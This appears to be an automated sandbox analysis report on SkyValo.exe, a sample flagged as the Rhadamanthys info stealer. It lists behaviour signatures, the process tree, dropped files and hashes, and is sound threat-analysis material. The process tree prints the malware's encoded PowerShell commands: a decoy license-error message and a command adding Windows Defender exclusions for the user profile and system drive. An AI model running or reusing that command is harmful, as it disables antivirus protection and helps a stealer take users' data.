Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

23/10/2023, 23:04

231023-22jrksgg9y 10

23/10/2023, 22:34

231023-2hlf3agf2w 10

Analysis

  • max time kernel
    74s
  • max time network
    139s
  • platform
    windows10-1703_x64
  • resource
    win10-20231023-en
  • resource tags

    arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
  • submitted
    23/10/2023, 22:34

General

  • Target

    SkyValo.exe

  • Size

    638KB

  • MD5

    e73e141a15cadcc8ab8ec09d712c59b0

  • SHA1

    bace5f12f6ff22a0f1afc12b5d772d6c44cc0e61

  • SHA256

    a4704499fb314be36d560f009756f709d61c16f4627e9002d6f2ca08e048f6c1

  • SHA512

    101b15b36ba97213575f713de30deeb1c9c7c089432dfaba32d608a8aadfd14b76d7db6aeed79a72af8a6ee0b62ae6ebae0953e9927770eee8d8b0d384ad3c30

  • SSDEEP

    12288:PjOubH2seO0lXVrUy201HuEZA6PUifgDsqAhPSQIXY:PjOaWseO2XV4y2suEZ5PUygQhhPMXY

Score
10/10

Malware Config

Signatures

  • Detect rhadamanthys stealer shellcode 4 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SkyValo.exe
    "C:\Users\Admin\AppData\Local\Temp\SkyValo.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAbABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAgAGYAbwB1AG4AZAAuACAAUABsAGUAYQBzAGUAIABjAG8AbgBuAGUAYwB0ACAAdgBpAGEAIABzAHQAZQBhAG0AIAB0AG8AIABnAGUAdAAgAGEAIABsAGkAYwBlAG4AcwBlAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcABxACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4552
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAagBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAcgBiACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5080
    • C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2112
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\license.bat" "
      2⤵
      • Checks computer location settings
      PID:2588
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3284
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    1⤵
    • Modifies Internet Explorer settings
    PID:4844
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4604
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:3436
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Drops file in Windows directory
    • Modifies registry class
    PID:4344
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
    1⤵
    • Modifies registry class
    PID:1540

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    7acad0587a8a25fc3e0e2dba4d64a897

    SHA1

    56ecf1981a991fe0fad24b72a9b5eccaea559042

    SHA256

    3be70902b3a6d6eedea41b53194dfcda7cc72686fe68dc784962382d59a804c5

    SHA512

    4637da7d9434604b85e60f5026984e008759e5401e8babfdc9d56c4a0bc62ff7a92f5dcd7ecbc5e19c46616dfac5ecba0c5d736fcc1ea93e326c21c37c929f15

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\VBZVDBB5\3a01b5d[1].htm

    Filesize

    315KB

    MD5

    1b0017ad38a38625e73fd96142e0e53f

    SHA1

    c0acdddc606f64f1cc86c3e47c690d0c76913c16

    SHA256

    afc6af14a1609586d2f73c10c0558cfe4412db2044b2322383e9e4d731cdd63f

    SHA512

    f87018636b62f1731c05d2ca8ed4c682456777d7d035d2372d724bf627c7aeb20bb486e4f2627ef126ead595570f9d7b345141ab11fb1ad1d4916fb37d773434

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5dtauu0.ufn.ps1

    Filesize

    1B

    MD5

    c4ca4238a0b923820dcc509a6f75849b

    SHA1

    356a192b7913b04c54574d18c28d46e6395428ab

    SHA256

    6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

    SHA512

    4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

  • C:\Users\Admin\AppData\Local\Temp\license.bat

    Filesize

    40B

    MD5

    0b667d11abcd8950cae485cf822220f4

    SHA1

    58e963d436ab5bf929766a6f59b7d21158edebd5

    SHA256

    67ff64ecbd272ece61acd917e55bd965098853a8e341bc5468a272d476e229c5

    SHA512

    ca279059b5e525375dbf6f6fb6b4699ed34c7b46ce208cc461dbcf18e2934343f33b7510a24367a890c78ce95536ffbaf3ebbd6f604c225cbacdd0d53193053c

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe

    Filesize

    456KB

    MD5

    515a0c8be21a5ba836e5687fc2d73333

    SHA1

    c52be9d0d37ac1b8d6bc09860e68e9e0615255ab

    SHA256

    9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae

    SHA512

    4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe

    Filesize

    456KB

    MD5

    515a0c8be21a5ba836e5687fc2d73333

    SHA1

    c52be9d0d37ac1b8d6bc09860e68e9e0615255ab

    SHA256

    9950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae

    SHA512

    4e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522

  • memory/2112-24-0x00000000005A0000-0x00000000005A7000-memory.dmp

    Filesize

    28KB

  • memory/2112-25-0x00000000026F0000-0x0000000002AF0000-memory.dmp

    Filesize

    4.0MB

  • memory/2112-29-0x00000000026F0000-0x0000000002AF0000-memory.dmp

    Filesize

    4.0MB

  • memory/2112-28-0x00000000026F0000-0x0000000002AF0000-memory.dmp

    Filesize

    4.0MB

  • memory/2112-27-0x00000000026F0000-0x0000000002AF0000-memory.dmp

    Filesize

    4.0MB

  • memory/3284-94-0x000001E3362A0000-0x000001E3362A2000-memory.dmp

    Filesize

    8KB

  • memory/3284-41-0x000001E338D20000-0x000001E338D30000-memory.dmp

    Filesize

    64KB

  • memory/3284-70-0x000001E339500000-0x000001E339510000-memory.dmp

    Filesize

    64KB

  • memory/4344-472-0x0000021DD66C0000-0x0000021DD66E0000-memory.dmp

    Filesize

    128KB

  • memory/4344-475-0x0000021DD91A0000-0x0000021DD91C0000-memory.dmp

    Filesize

    128KB

  • memory/4344-364-0x0000021DD69C0000-0x0000021DD6AC0000-memory.dmp

    Filesize

    1024KB

  • memory/4344-241-0x0000021DC4C30000-0x0000021DC4C32000-memory.dmp

    Filesize

    8KB

  • memory/4344-251-0x0000021DC4C60000-0x0000021DC4C62000-memory.dmp

    Filesize

    8KB

  • memory/4344-254-0x0000021DC4C80000-0x0000021DC4C82000-memory.dmp

    Filesize

    8KB

  • memory/4344-495-0x0000021DDA240000-0x0000021DDA340000-memory.dmp

    Filesize

    1024KB

  • memory/4552-95-0x0000000009420000-0x0000000009A98000-memory.dmp

    Filesize

    6.5MB

  • memory/4552-159-0x00000000726F0000-0x0000000072DDE000-memory.dmp

    Filesize

    6.9MB

  • memory/4552-17-0x0000000006740000-0x0000000006750000-memory.dmp

    Filesize

    64KB

  • memory/4552-31-0x0000000007F00000-0x0000000007F4B000-memory.dmp

    Filesize

    300KB

  • memory/4552-15-0x00000000726F0000-0x0000000072DDE000-memory.dmp

    Filesize

    6.9MB

  • memory/4552-30-0x0000000007520000-0x000000000753C000-memory.dmp

    Filesize

    112KB

  • memory/4552-22-0x00000000073B0000-0x0000000007416000-memory.dmp

    Filesize

    408KB

  • memory/4552-96-0x0000000008BA0000-0x0000000008BBA000-memory.dmp

    Filesize

    104KB

  • memory/4552-19-0x0000000006740000-0x0000000006750000-memory.dmp

    Filesize

    64KB

  • memory/4552-32-0x0000000007D70000-0x0000000007DE6000-memory.dmp

    Filesize

    472KB

  • memory/4552-20-0x0000000006D80000-0x00000000073A8000-memory.dmp

    Filesize

    6.2MB

  • memory/4552-229-0x00000000726F0000-0x0000000072DDE000-memory.dmp

    Filesize

    6.9MB

  • memory/4552-116-0x0000000009AA0000-0x0000000009F9E000-memory.dmp

    Filesize

    5.0MB

  • memory/4552-220-0x0000000006740000-0x0000000006750000-memory.dmp

    Filesize

    64KB

  • memory/4552-119-0x0000000008E40000-0x0000000008ED2000-memory.dmp

    Filesize

    584KB

  • memory/4552-223-0x0000000006740000-0x0000000006750000-memory.dmp

    Filesize

    64KB

  • memory/4552-202-0x0000000006740000-0x0000000006750000-memory.dmp

    Filesize

    64KB

  • memory/4552-163-0x0000000006740000-0x0000000006750000-memory.dmp

    Filesize

    64KB

  • memory/5080-23-0x0000000007830000-0x0000000007896000-memory.dmp

    Filesize

    408KB

  • memory/5080-160-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

    Filesize

    64KB

  • memory/5080-122-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

    Filesize

    64KB

  • memory/5080-164-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

    Filesize

    64KB

  • memory/5080-121-0x00000000726F0000-0x0000000072DDE000-memory.dmp

    Filesize

    6.9MB

  • memory/5080-120-0x00000000093C0000-0x0000000009454000-memory.dmp

    Filesize

    592KB

  • memory/5080-118-0x0000000008FA0000-0x0000000009045000-memory.dmp

    Filesize

    660KB

  • memory/5080-111-0x0000000008E20000-0x0000000008E3E000-memory.dmp

    Filesize

    120KB

  • memory/5080-109-0x000000006DA60000-0x000000006DAAB000-memory.dmp

    Filesize

    300KB

  • memory/5080-108-0x0000000008E40000-0x0000000008E73000-memory.dmp

    Filesize

    204KB

  • memory/5080-105-0x000000007EF80000-0x000000007EF90000-memory.dmp

    Filesize

    64KB

  • memory/5080-26-0x0000000007920000-0x0000000007C70000-memory.dmp

    Filesize

    3.3MB

  • memory/5080-21-0x0000000006EC0000-0x0000000006EE2000-memory.dmp

    Filesize

    136KB

  • memory/5080-18-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

    Filesize

    64KB

  • memory/5080-16-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

    Filesize

    64KB

  • memory/5080-14-0x00000000726F0000-0x0000000072DDE000-memory.dmp

    Filesize

    6.9MB

  • memory/5080-531-0x000000007EF80000-0x000000007EF90000-memory.dmp

    Filesize

    64KB

  • memory/5080-540-0x00000000092A0000-0x00000000092BA000-memory.dmp

    Filesize

    104KB

  • memory/5080-556-0x0000000006B60000-0x0000000006B68000-memory.dmp

    Filesize

    32KB

  • memory/5080-566-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

    Filesize

    64KB

  • memory/5080-13-0x00000000047D0000-0x0000000004806000-memory.dmp

    Filesize

    216KB

  • memory/5080-614-0x00000000726F0000-0x0000000072DDE000-memory.dmp

    Filesize

    6.9MB